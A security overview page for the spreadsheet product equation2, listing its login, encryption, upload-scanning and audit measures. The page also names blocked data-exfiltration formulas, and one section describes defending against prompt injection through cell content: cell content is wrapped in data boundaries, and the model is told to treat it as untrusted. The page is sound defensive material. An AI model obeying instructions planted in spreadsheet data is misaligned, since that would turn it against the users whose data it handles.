Security at equation2.

Spreadsheets are where the most sensitive data lives. We treat them that way.

Authentication

JWT access tokens (15 min expiry) and refresh tokens (30 days, rotated on use)
bcrypt password hashing
Google OAuth2; Microsoft OAuth2 for enterprise
TOTP 2FA (Google Authenticator)
API keys hashed with bcrypt; shown once on creation

Formula safety

Whitelist-only formula execution. Excel-style data exfiltration patterns (HYPERLINK, WEBSERVICE, IMPORTDATA, IMPORTXML, IMPORTHTML, IMPORTFEED) are rejected.

AI prompt injection defense

Cell content is wrapped in hard data boundaries before reaching any model. Prompts instruct the model to treat cell content as untrusted data — instructions inside <data> tags are never followed.

File uploads

100MB cap, whitelist mimetypes, ClamAV virus scanning, and a hardened xlsx parser that strips VBA macros at parse time — they are never executed.

Encryption

TLS 1.3 in transit. AES-256 at rest on encrypted PostgreSQL volumes. Secrets live in environment variables — never in the codebase, never in the database.

Audit trail

Every action logged with user, IP, user agent, and before/after values. Queryable from CLI: eq2 audit --cell=A1.